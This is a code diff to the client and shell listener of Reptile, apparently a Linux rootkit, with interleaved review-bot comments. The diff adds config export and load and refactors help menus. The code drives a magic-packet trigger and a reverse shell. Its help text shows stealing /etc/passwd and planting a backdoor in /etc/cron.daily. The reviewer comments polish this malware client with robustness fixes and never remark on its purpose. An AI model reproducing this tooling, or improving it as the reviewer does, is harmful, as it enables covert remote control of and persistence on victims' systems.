diff --git a/sbin/client.c b/sbin/client.c index f9f9935..570458a 100644 --- a/sbin/client.c +++ b/sbin/client.c @@ -18,14 +18,17 @@ #include #include #include +#include #include "config.h" #include "util.h" pid_t pid; +char *listener, *packet; char *var_str[] = {"lhost", "lport", "srchost", "srcport", "rhost", "rport", "prot", "pass", "token"}; + char *var_str_up[] = {"LHOST", "LPORT", "SRCHOST", "SRCPORT", "RHOST", "RPORT", "PROT", "PASS", "TOKEN"}; @@ -48,11 +51,14 @@ int set(char **args); int unset(char **args); int show(char **args); int run(char **args); +int export(char **args); +int load(char **args); -char *builtin_str[] = {"help", "set", "unset", "show", "run", "exit"}; -int (*builtin_func[])(char **) = {&help, &set, &unset, &show, &run, &__exit}; +char *builtin_str[] = {"help", "set", "unset", "show", "run", "export", "load", "exit"}; +int (*builtin_func[])(char **) = {&help, &set, &unset, &show, &run, &export, &load, &__exit}; -int num_builtins() { return sizeof(builtin_str) / sizeof(char *); } +int num_builtins() +{ return sizeof(builtin_str) / sizeof(char *); } int launch(char **args) { 
@@ -76,47 +82,66 @@ int launch(char **args) return 1; } +void help_set() +{ + fprintf(stdout, "%s \n", builtin_str[1]); + fprintf(stdout, "Example: set LHOST 192.168.0.2\n"); +} + +void help_unset() +{ + fprintf(stdout, "%s \n", builtin_str[2]); + fprintf(stdout, "Example: unset RHOST\n"); +} + +void help_conf(int i) +{ + fprintf(stdout, "%s \n", builtin_str[i]); + fprintf(stdout, "Example: %s client.conf\n", builtin_str[i]); +} + +void no_help() +{ + fprintf(stdout, "This command doesn't need help\n"); +} + int help(char **args) { if (args[0] == NULL) return 1; if (args[1] != NULL) { - if (strcmp(args[1], builtin_str[1]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[1]); - fprintf(stdout, "Example: set LHOST 192.168.0.2\n"); + if (strcmp(args[1], builtin_str[0]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[1]) == 0) { + help_set(); } else if (strcmp(args[1], builtin_str[2]) == 0) { - fprintf(stdout, "%s \n", builtin_str[2]); - fprintf(stdout, "Example: unset RHOST\n"); + help_unset(); + } else if (strcmp(args[1], builtin_str[3]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[4]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[5]) == 0) { + help_conf(5); + } else if (strcmp(args[1], builtin_str[6]) == 0) { + help_conf(6); + } else if (strcmp(args[1], builtin_str[7]) == 0) { + no_help(); } else { - if (strcmp(args[1], builtin_str[0]) == 0 || - strcmp(args[1], builtin_str[3]) == 0 || - strcmp(args[1], builtin_str[4]) == 0 || - strcmp(args[1], builtin_str[5]) == 0) { - fprintf(stdout, - "This command doesn't need help\n"); - } else { - fprintf(stdout, "This command is not valid!\n"); - } + fprintf(stdout, "This command is not valid!\n"); } } else { fprintf(stdout, "\n\e[01;36mReptile Client\e[00m\n"); - fprintf(stdout, "\e[01;32mWritten by: F0rb1dd3n\e[00m\n\n"); fprintf(stdout, "\t%s\t\tShow this help\n", builtin_str[0]); - fprintf(stdout, "\t%s\t\tSet value to a variable\n", - builtin_str[1]); - fprintf(stdout, 
"\t%s\t\tUnset value to a variable\n", - builtin_str[2]); - fprintf(stdout, "\t%s\t\tShow the current configuration\n", - builtin_str[3]); - fprintf(stdout, - "\t%s\t\tRun the listener and send the magic packet\n", - builtin_str[4]); - fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[5]); - fprintf(stdout, - "Type: \"help \" to see specific help\n"); + fprintf(stdout, "\t%s\t\tSet value to a variable\n", builtin_str[1]); + fprintf(stdout, "\t%s\t\tUnset value to a variable\n", builtin_str[2]); + fprintf(stdout, "\t%s\t\tShow the current configuration\n", builtin_str[3]); + fprintf(stdout, "\t%s\t\tRun the listener and send the magic packet\n", builtin_str[4]); + fprintf(stdout, "\t%s\t\tExport a configuration to a file\n", builtin_str[5]); + fprintf(stdout, "\t%s\t\tLoad a configuration from a file\n", builtin_str[6]); + fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[7]); + fprintf(stdout, "Type: \"help \" to see specific help\n"); } fprintf(stdout, "\n"); @@ -137,6 +162,12 @@ int __exit(char **args) var_array[i] = NULL; } + if (listener) + free(listener); + + if (packet) + free(packet); + fprintf(stdout, "\n"); return 0; } @@ -232,13 +263,18 @@ int show(char **args) return 1; } +void interrupt(int signal) +{ + fprintf(stdout, "\r"); + fflush(stdout); + fprintf(stdout, "%s Interrupted: %d\n", warn, signal); +} + int run(char **args) { pid_t pid, pid2; - int status, len; - char *listener, *packet; - char *envp[1] = {NULL}; - char *pwd = get_current_dir_name(); + int status; + //char *envp[1] = {NULL}; if (args[0] == NULL) return 1; 
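Review bot: help() now matches `args[1]` against `builtin_str[0]` through `builtin_str[7]` by literal index, and adding `export` and `load` already moved `exit` from index 5 to 7, so every future insertion has to be mirrored by hand in this chain and in the `help_conf(5)` / `help_conf(6)` calls. A table parallel to `builtin_func`, for example `void (*builtin_help[])(void)`, searched with a loop over `num_builtins()`, would remove the magic numbers; `help_conf` takes an `int`, so it would need a small wrapper per command. The new helpers (`help_set`, `help_unset`, `help_conf`, `no_help`) are only used in this file as far as the hunk shows and could be `static`, each with a one-line comment naming the command it describes. The same index chain is added to help() in sbin/listener.c.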
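Review bot: `interrupt()` calls `fprintf` and `fflush`, which are not async-signal-safe, so a signal that arrives while the client is itself inside stdio can deadlock or corrupt the stream (CERT SIG30-C). Have the handler set a `volatile sig_atomic_t` flag, or emit a fixed message with `write(STDOUT_FILENO, ...)`, and print the formatted warning from normal code. Its parameter is named `signal`, which shadows the `signal()` function that the later run() hunk uses to install it; `signo` is the usual name. That later hunk installs the handler for SIGINT and SIGTERM and never restores the previous disposition, so it appears to stay in force after run() returns. The commented-out `//char *envp[1] = {NULL};` should be deleted rather than kept.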
@@ -288,29 +324,6 @@ int run(char **args) } } - len = strlen(pwd); - - listener = (char *)malloc(len + 9); - - if (!listener) - fatal("malloc"); - - packet = (char *)malloc(len + 7); - - if (!packet) { - free(listener); - fatal("malloc"); - } - - bzero(listener, len + 9); - bzero(packet, len + 7); - - strcpy(listener, pwd); - strcat(listener, "/listener"); - - strcpy(packet, pwd); - strcat(packet, "/packet"); - char *arg_listener[] = {listener, "-p", var_array[1], "-s", var_array[7], NULL, NULL}; @@ -326,12 +339,12 @@ int run(char **args) fatal("on forking proccess"); if (pid > 0) { + signal(SIGTERM, interrupt); + signal(SIGINT, interrupt); + do { waitpid(pid, &status, WUNTRACED); } while (!WIFEXITED(status) && !WIFSIGNALED(status)); - - free(listener); - free(packet); } if (pid == 0) { @@ -345,8 +358,8 @@ int run(char **args) arg_listener[3] = NULL; arg_listener[4] = NULL; } - execve(arg_listener[0], arg_listener, envp); - exit(1); + if (execvp(arg_listener[0], arg_listener) == -1) + fprintf(stderr, "%s listener could not be launched\n", bad); } if (pid2 == 0) { 
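Review bot: When `execvp` fails in the listener child, the new code only prints a message and falls through, because the `exit(1)` that followed the old `execve` was removed; the forked child then carries on in run() and, as far as these hunks show, returns to the caller as a second copy of the client. Add `_exit(1);` after the `fprintf`. The packet branch in the next hunk has the same fall-through, and its `kill(pid2, SIGINT)` sits inside `if (pid2 == 0)`, so it is `kill(0, SIGINT)` and signals the whole process group rather than one child. `execvp` returns only on failure, so the `== -1` test is redundant, and unlike the old `execve(..., envp)` call it hands the caller's full environment to the child. run() starts and ends outside this hunk.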
@@ -358,10 +371,80 @@ int run(char **args) arg_packet[16] = NULL; } usleep(100 * 1500); - execve(arg_packet[0], arg_packet, envp); - exit(1); + + if (execvp(arg_packet[0], arg_packet) == -1) { + fprintf(stderr, "%s packet could not be launched\n", bad); + kill(pid2, SIGINT); + } + } + } + + return 1; +} + +/* + * Thanks aliyuchang33 for suggesting this! ;) + * + * https://github.com/f0rb1dd3n/Reptile/pull/61/commits/0482eeff93c5b3f9097f7e06e2b2a0fcf248eb8e + * + */ + +int export(char **args) +{ + int vars; + FILE *confile; + + if (args[0] == NULL) + return 1; + + if (args[1] == NULL) { + fprintf(stdout, "%s wrong syntax!\n", bad); + return 1; + } + + if (!(confile = fopen(args[1], "w+"))) { + fprintf(stderr, "%s Cannot open config file\n", bad); + return 1; + } + + for (vars = 0; vars < 9; vars++) + fprintf(confile, "%s\n", var_array[vars]); + + fclose(confile); + fprintf(stdout, "%s Configuration exported\n", good); + return 1; +} + +int load(char **args) +{ + int vars; + FILE *confile; + + if (args[0] == NULL) + return 1; + + if (args[1] == NULL) { + fprintf(stdout, "%s wrong syntax!\n", bad); + return 1; + } + + if (!(confile = fopen(args[1], "r+"))) { + fprintf(stderr, "%s Cannot open config file\n", bad); + return 1; + } + + for (vars = 0; vars < 9; vars++) { + char arg[50] = {0}; + fgets(arg, 50, confile); + + if (strcmp(arg, "(null)\n")) { + arg[strlen(arg) - 1] = '\0'; + var_array[vars] = strdup(arg); } } + + fclose(confile); + fprintf(stdout, "%s Configuration loaded\n", good); return 1; } @@ -469,9 +552,8 @@ void client_loop() int main() { - char lport[] = "4444"; - char srcport[] = "666"; - char token[] = "hax0r"; + int len; + char *pwd = get_current_dir_name(); system("clear"); printf("\n\e[01;36mReptile Client\e[00m\n"); 
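Review bot: In load(), the return value of `fgets` is ignored, so a file with fewer than nine lines leaves `arg` empty and `arg[strlen(arg) - 1] = '\0'` writes at index `(size_t)-1`, outside the 50-byte stack buffer. Each `strdup` result also replaces `var_array[vars]` without freeing the previous value or checking for NULL. The loop below stops at EOF, strips the newline with `strcspn`, and frees the old value, on the assumption that every non-NULL `var_array` entry is heap-allocated, which should be confirmed against set(). In export(), `fprintf(confile, "%s\n", var_array[vars])` passes NULL to `%s` for unset variables, which is undefined behaviour that load() then relies on by matching `"(null)\n"`; write an explicit marker for unset entries instead. `"r"` is sufficient for the `fopen` in load(), since the file is never written.

```c
	for (vars = 0; vars < 9; vars++) {
		char arg[50] = {0};
		char *value;

		/* EOF or read error: keep what was loaded so far */
		if (!fgets(arg, sizeof(arg), confile))
			break;

		/* safe on an empty line and on a last line without '\n' */
		arg[strcspn(arg, "\n")] = '\0';

		if (strcmp(arg, "(null)") == 0)
			continue;

		value = strdup(arg);
		if (!value)
			fatal("strdup");

		free(var_array[vars]);
		var_array[vars] = value;
	}
	/* … unchanged: fclose and "Configuration loaded" message … */
```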
@@ -479,9 +561,28 @@ int main() banner2(); printf("\n"); - var_array[1] = strdup(lport); - var_array[3] = strdup(srcport); - var_array[8] = strdup(token); + len = strlen(pwd); + + listener = (char *)malloc(len + 10); + + if (!listener) + fatal("malloc"); + + packet = (char *)malloc(len + 8); + + if (!packet) { + free(listener); + fatal("malloc"); + } + + bzero(listener, len + 10); + bzero(packet, len + 8); + + strcpy(listener, pwd); + strcat(listener, "/listener"); + + strcpy(packet, pwd); + strcat(packet, "/packet"); pid = fork(); diff --git a/sbin/listener.c b/sbin/listener.c index 8518160..9bcc5e3 100644 --- a/sbin/listener.c +++ b/sbin/listener.c 
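Review bot: `pwd` comes from `get_current_dir_name()` in the previous hunk and is passed to `strlen` here without a NULL check, although that call can fail, for example when the working directory has been removed; add `if (!pwd) fatal("get_current_dir_name");` before `len = strlen(pwd);`. The sizes `len + 10` and `len + 8` are hand-counted from the literals; `len + sizeof("/listener")` and `len + sizeof("/packet")` stay correct if the names change, and `snprintf(listener, size, "%s/listener", pwd)` would replace the `bzero`/`strcpy`/`strcat` sequence with one bounded call. `pwd` is heap-allocated by `get_current_dir_name()` and no `free(pwd)` is visible in this hunk. main() continues outside the hunk.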
@@ -73,55 +73,62 @@ void pel_error(char *s) } } +void help_download() +{ + fprintf(stdout, "%s \n", builtin_str[1]); + fprintf(stdout, "Example: download /etc/passwd /tmp\n"); +} + +void help_upload() +{ + fprintf(stdout, "%s \n", builtin_str[2]); + fprintf(stdout, "Example: upload /root/backdoor /etc/cron.daily\n"); +} + +void help_delay() +{ + fprintf(stdout, "%s \n", builtin_str[4]); + fprintf(stdout, "Example: delay 3600\n\n"); + fprintf(stdout, "%s Use \"delay 0\" if you don't wanna a " + "connecion every X time\n", warn); +} + +void no_help() +{ + fprintf(stdout, "This command doesn't need help\n"); +} + int help(int sock, char **args) { if (args[0] == NULL && sock == -1) return 1; if (args[1] != NULL) { - if (strcmp(args[1], builtin_str[1]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[1]); - fprintf(stdout, "Example: download /etc/passwd /tmp\n"); + if (strcmp(args[1], builtin_str[0]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[1]) == 0) { + help_download(); } else if (strcmp(args[1], builtin_str[2]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[2]); - fprintf( - stdout, - "Example: upload /root/backdoor /etc/cron.daily\n"); + help_upload(); + } else if (strcmp(args[1], builtin_str[3]) == 0) { + no_help(); } else if (strcmp(args[1], builtin_str[4]) == 0) { - fprintf(stdout, "%s \n", builtin_str[4]); - fprintf(stdout, "Example: delay 3600\n\n"); - fprintf(stdout, - "%s Use \"delay 0\" if you don't wanna a " - "connecion every X time\n", - warn); + help_delay(); + } else if (strcmp(args[1], builtin_str[5]) == 0) { + no_help(); } else { - if (strcmp(args[1], builtin_str[0]) == 0 || - strcmp(args[1], builtin_str[3]) == 0 || - strcmp(args[1], builtin_str[5]) == 0) { - fprintf(stdout, - "This command doesn't need help\n"); - } else { - fprintf(stdout, "This command is not valid!\n"); - } + fprintf(stdout, "This command is not valid!\n"); } } else { fprintf(stdout, "\n\e[01;36mReptile Shell\e[00m\n"); - fprintf(stdout, "\e[01;32mWritten by: 
F0rb1dd3n\e[00m\n\n"); fprintf(stdout, "\t%s\t\tShow this help\n", builtin_str[0]); - fprintf(stdout, "\t%s\tDownload a file from host\n", - builtin_str[1]); - fprintf(stdout, "\t%s\t\tUpload a file to host\n", - builtin_str[2]); - fprintf(stdout, "\t%s\t\tOpen a full TTY interactive shell\n", - builtin_str[3]); - fprintf(stdout, "\t%s\t\tSet time to reverse shell connect\n", - builtin_str[4]); + fprintf(stdout, "\t%s\tDownload a file from host\n", builtin_str[1]); + fprintf(stdout, "\t%s\t\tUpload a file to host\n", builtin_str[2]); + fprintf(stdout, "\t%s\t\tOpen a full TTY interactive shell\n", builtin_str[3]); + fprintf(stdout, "\t%s\t\tSet time to reverse shell connect\n", builtin_str[4]); fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[5]); - fprintf(stdout, - "Type: \"help \" to see specific help\n"); + fprintf(stdout, "Type: \"help \" to see specific help\n"); } fprintf(stdout, "\n"); @@ -550,7 +557,7 @@ int execute(int sock, char **args) { int i, ret; - if (args[0] == NULL && sock == -1) + if (args[0] == NULL || sock == -1) return 1; for (i = 0; i < num_builtins(); i++) {
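Review bot: The guard corrected here in execute() is left as `args[0] == NULL && sock == -1` in help() earlier in this file, where the next statement reads `args[1]`; with a valid socket and an empty argument vector that read goes past the terminating NULL. If help() can be reached other than through execute(), it needs `if (args[0] == NULL) return 1;` as well. With `||`, execute() now returns 1 silently whenever `sock == -1`, and a short message on that path would tell the user why the command was ignored. execute() continues outside the hunk.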